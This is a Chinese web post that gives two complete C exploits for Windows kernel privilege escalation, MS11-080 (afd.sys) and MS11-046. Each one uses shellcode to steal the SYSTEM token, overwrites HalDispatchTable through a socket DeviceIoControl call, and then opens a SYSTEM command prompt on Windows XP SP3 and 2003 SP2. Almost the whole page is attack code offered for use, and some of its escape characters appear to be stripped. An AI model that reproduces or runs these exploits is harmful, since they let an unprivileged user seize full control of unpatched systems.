MS11-080、MS11-046两个提权代码

* MS11-080 Afd.sys Privilege Escalation Exploit
* 来源:Matteo Memelli,http://www.exploit-db.com/exploits/18176/
* 改编:KiDebug,[email protected]
* 编译:VC6.0
* 测试环境:原版Windows XP SP3,Windows 2003 SP2,普通用户
*/
#include <stdio.h>
#include <Winsock2.h>
#include <windows.h>
#pragma comment (lib, "ws2_32.lib")
 
typedef struct _RTL_PROCESS_MODULE_INFORMATION {
HANDLE Section;                 // Not filled in
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR  FullPathName[ 256 ];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;
 
typedef struct _RTL_PROCESS_MODULES {
ULONG NumberOfModules;
RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;
 
typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
NtQueryIntervalProfile_  NtQueryIntervalProfile;
NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
NtQuerySystemInformation_ NtQuerySystemInformation;
 
ULONG    PsInitialSystemProcess, PsReferencePrimaryToken, PsGetThreadProcess, WriteToHalDispatchTable;
 
void _declspec(naked) ShellCode()
{
__asm
{
pushad
pushfd
mov esi,PsReferencePrimaryToken
FindTokenOffset:
lodsb
cmp al, 8Dh;
jnz FindTokenOffset
mov edi,[esi+1]
mov esi,PsInitialSystemProcess
mov esi,[esi]
push fs:[124h]
mov eax,PsGetThreadProcess
call eax
add esi, edi
add edi, eax
movsd
popfd
popad
ret
}
}
 
void main( )
{
HMODULE  ntdll        =  GetModuleHandle( "ntdll.dll" );
NtQueryIntervalProfile    =  (NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
NtAllocateVirtualMemory    =  (NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
NtQuerySystemInformation  =  ( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );
if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )
return;
 
ULONG    BaseAddress = 1 , RegionSize = 0x1000, status;
status = NtAllocateVirtualMemory( (HANDLE)0xFFFFFFFF, (PVOID*)&BaseAddress, 0, &RegionSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if ( status )
return;
 
//取ntoskrnl的信息,只要调用一次就行
ULONG  NtoskrnlBase;
RTL_PROCESS_MODULES  module;
status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11
if ( status != 0xC0000004 )    //STATUS_INFO_LENGTH_MISMATCH
return;
 
NtoskrnlBase     =  (ULONG)module.Modules[0].ImageBase;
 
//把ntoskrnl.exe加载进来
HMODULE    ntoskrnl;
ntoskrnl    =    LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );
if ( ntoskrnl == NULL )
return;
 
//计算实际地址
WriteToHalDispatchTable    =  (ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4 + 2; //需要覆盖的地址
PsInitialSystemProcess    =  (ULONG)GetProcAddress(ntoskrnl,"PsInitialSystemProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
PsReferencePrimaryToken    =  (ULONG)GetProcAddress(ntoskrnl,"PsReferencePrimaryToken") - (ULONG)ntoskrnl + NtoskrnlBase;
PsGetThreadProcess      =  (ULONG)GetProcAddress(ntoskrnl,"PsGetThreadProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
 
//以下代码就各显神通了
if ( VirtualAlloc( (PVOID)0x02070000, 0x20000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) == NULL )
return;
 
memset((PVOID)0x02070000,0x90,0x20000);
memcpy((PVOID)0x02080000,ShellCode,100);
 
WSADATA ws;
 
SOCKET tcp_socket;
struct sockaddr_in peer;
ULONG  dwReturnSize;
 
WSAStartup(0x0202,&ws);
 
peer.sin_family = AF_INET;
peer.sin_port = htons(4455);
peer.sin_addr.s_addr = inet_addr( "127.0.0.1" );
 
tcp_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
 
if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(struct sockaddr_in)) )
{
printf("connect errorn");
}
 
UCHAR  buf1[26]= "x41x41x41x41x42x42x42x42x00x00x00x00x44x44x44x44x01x00x00x00xe8x00x34xf0x00";
memset((PVOID)0x1000,0x45,0x108);
memcpy((PVOID)0x1000,buf1,25);
 
if(!DeviceIoControl((HANDLE)tcp_socket,0x000120bb, (PVOID)0x1004, 0x108, (PVOID)WriteToHalDispatchTable, 0x0,&dwReturnSize, NULL))
{
printf("error=%dn", GetLastError());
}
 
//触发,弹出SYSTEM的CMD
NtQueryIntervalProfile( 2, &status );
ShellExecute( NULL, "open", "cmd.exe", NULL, NULL, SW_SHOW);
return;
}
 
 
 
 
 
 
/* 触发MS11-046
* 来源:azy,http://hi.baidu.com/azy0922/blog/item/053065d197cebfca572c8492.html
* 改编:KiDebug,[email protected]
* 编译:VC6.0
* 测试环境:原版Windows XP SP3,Windows 2003 SP2,普通用户
*/
#include <stdio.h>
#include <Winsock2.h>
#include <windows.h>
#pragma comment (lib, "ws2_32.lib")
 
typedef struct _RTL_PROCESS_MODULE_INFORMATION {
HANDLE Section;                 // Not filled in
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR  FullPathName[ 256 ];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;
 
typedef struct _RTL_PROCESS_MODULES {
ULONG NumberOfModules;
RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;
 
typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
NtQueryIntervalProfile_  NtQueryIntervalProfile;
NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
NtQuerySystemInformation_ NtQuerySystemInformation;
 
ULONG    PsInitialSystemProcess, PsReferencePrimaryToken, PsGetThreadProcess, WriteToHalDispatchTable;
 
void _declspec(naked) ShellCode()
{
__asm
{
pushad
pushfd
mov esi,PsReferencePrimaryToken
FindTokenOffset:
lodsb
cmp al, 8Dh;
jnz FindTokenOffset
mov edi,[esi+1]
mov esi,PsInitialSystemProcess
mov esi,[esi]
push fs:[124h]
mov eax,PsGetThreadProcess
call eax
add esi, edi
add edi, eax
movsd
popfd
popad
ret
}
}
 
void main( )
{
HMODULE  ntdll        =  GetModuleHandle( "ntdll.dll" );
NtQueryIntervalProfile    =  (NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
NtAllocateVirtualMemory    =  (NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
NtQuerySystemInformation  =  ( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );
if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )
return;
 
//取ntoskrnl的信息,只要调用一次就行
ULONG  status, NtoskrnlBase;
RTL_PROCESS_MODULES  module;
status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11
if ( status != 0xC0000004 )    //STATUS_INFO_LENGTH_MISMATCH
return;
 
NtoskrnlBase     =  (ULONG)module.Modules[0].ImageBase;
 
//把ntoskrnl.exe加载进来
HMODULE    ntoskrnl;
ntoskrnl    =    LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );
if ( ntoskrnl == NULL )
return;
 
//计算实际地址
WriteToHalDispatchTable    =  (ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4 + 2; //需要覆盖的地址
PsInitialSystemProcess    =  (ULONG)GetProcAddress(ntoskrnl,"PsInitialSystemProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
PsReferencePrimaryToken    =  (ULONG)GetProcAddress(ntoskrnl,"PsReferencePrimaryToken") - (ULONG)ntoskrnl + NtoskrnlBase;
PsGetThreadProcess      =  (ULONG)GetProcAddress(ntoskrnl,"PsGetThreadProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
 
//以下代码就各显神通了
if ( VirtualAlloc( (PVOID)0x02070000, 0x20000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) == NULL )
return;
 
memset((PVOID)0x02070000,0x90,0x20000);
memcpy((PVOID)0x02080000,ShellCode,100);
 
WSADATA ws;
 
SOCKET tcp_socket;
struct sockaddr_in peer;
ULONG  dwReturnSize;
 
WSAStartup(0x0202,&ws);
 
peer.sin_family = AF_INET;
peer.sin_port = htons(0);
peer.sin_addr.s_addr = inet_addr( "127.0.0.1" );
 
tcp_socket = socket(AF_INET, SOCK_STREAM, 0);
 
if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(struct sockaddr_in)) )
{
printf("connect errorn");
}
 
DWORD buf[0x30];
buf[3]=1;
buf[4]=0x20;
 
if(!DeviceIoControl((HANDLE)tcp_socket,0x12007, (PVOID)buf, 0x60, (PVOID)WriteToHalDispatchTable, 0x0,&dwReturnSize, NULL))
{
printf("error=%dn", GetLastError());
}
 
//触发,弹出SYSTEM的CMD
NtQueryIntervalProfile( 2, &status );
ShellExecute( NULL, "open", "cmd.exe", NULL, NULL, SW_SHOW);
return;
}


你可能感兴趣的:(windows,socket,struct,tcp,Module,null)